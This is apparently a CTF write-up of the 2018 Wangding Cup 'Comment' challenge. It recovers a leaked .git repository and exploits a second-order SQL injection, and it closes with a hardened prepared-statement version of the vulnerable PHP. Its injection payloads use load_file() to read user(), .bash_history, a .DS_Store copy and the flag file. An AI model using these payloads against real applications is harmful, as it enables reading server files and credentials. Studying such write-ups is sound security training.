[网鼎杯 2018]Comment
Scanning directories with dirsearch reveals a leaked .git directory; use GitHack to recover the repository. The GitHack by lijiejie that circulates online cannot solve this challenge; the genuine one is the version that prints the GitHack banner shown here:
git clone git://github.com/BugScanTeam/GitHack
The source files recovered directly are incomplete. Change into the scan output directory and restore the full tree from the reflog:
git log --reflog
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
Source code:
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    switch ($_GET['do'])
    {
        case 'write':
            $category = addslashes($_POST['category']);
            $title = addslashes($_POST['title']);
            $content = addslashes($_POST['content']);
            $sql = "insert into board
                    set category = '$category',
                        title = '$title',
                        content = '$content'";
            $result = mysql_query($sql);
            header("Location: ./index.php");
            break;
        case 'comment':
            $bo_id = addslashes($_POST['bo_id']);
            $sql = "select category from board where id='$bo_id'";
            $result = mysql_query($sql);
            $num = mysql_num_rows($result);
            if($num>0){
                $category = mysql_fetch_array($result)['category'];
                $content = addslashes($_POST['content']);
                $sql = "insert into comment
                        set category = '$category',
                            content = '$content',
                            bo_id = '$bo_id'";
                $result = mysql_query($sql);
            }
            header("Location: ./comment.php?id=$bo_id");
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>
Every field in the write branch goes through addslashes(), so the first INSERT itself is safe, but the backslashes are only consumed by the SQL parser: the category value stored in the board table is the raw, unescaped input. The comment branch then reads that category back and concatenates it into the second INSERT without any escaping (a second-order injection). Posting the category `', content=user(),/*` and then commenting on that post with the content `*/#` produces the following SQL:
    $sql = "insert into comment
            set category = '', content=user(),/*
                content = '*/#',
                bo_id = '$bo_id'";
The current database user returned by user() now appears in the comment. Next, use load_file() in the same position to read the shell history:
    ', content=load_file('/home/www/.bash_history'),/*
The history shows html.zip being unzipped and copied to /var/www; the .DS_Store inside /var/www/html was deleted at the end, but the copy under /tmp was not. Read it hex-encoded, since .DS_Store is a binary file:
    ', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
Decoding the result with Burp Suite's Decoder reveals the file flag_8946e1ff1ee3e40f.php.
The real flag is under /var/www/html:
    ',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*
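For reference, here is a hardened version of the `comment` branch, written as an added example rather than taken from the challenge source. It assumes `$db` is an already-connected mysqli object (the original mysql.php relies on the mysql_* extension, which was removed in PHP 7) and uses an explicit column list instead of MySQL's `INSERT ... SET` form; the point is that the category read back from the database is bound as a parameter too, so a stored payload is inert.

```php
<?php
// Added example, not the challenge's own code. $db is assumed to be a connected mysqli.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // failures throw instead of returning false

function add_comment(mysqli $db, string $bo_id, string $content): bool
{
    // 1. Look up the board's category. $bo_id is bound as a parameter, so any
    //    quotes in it never reach the SQL parser (addslashes() is not needed).
    $stmt = $db->prepare("SELECT category FROM board WHERE id = ?");
    $stmt->bind_param("s", $bo_id);
    $stmt->execute();
    $stmt->bind_result($category);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return false; // no such post, nothing to attach the comment to
    }

    // 2. Insert the comment. $category came out of the database, but it is still
    //    untrusted: the original code concatenated it raw into this statement,
    //    which is exactly where the "', content=user(),/*" payload took effect.
    //    Binding every value, including $category, closes that hole.
    $stmt = $db->prepare(
        "INSERT INTO comment (category, content, bo_id) VALUES (?, ?, ?)"
    );
    $stmt->bind_param("sss", $category, $content, $bo_id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Dispatcher usage replacing the original 'comment' case. The redirect target is
// URL-encoded so the id cannot inject into the Location header either.
// add_comment($db, $_POST['bo_id'] ?? '', $_POST['content'] ?? '');
// header("Location: ./comment.php?id=" . urlencode($_POST['bo_id'] ?? ''));
```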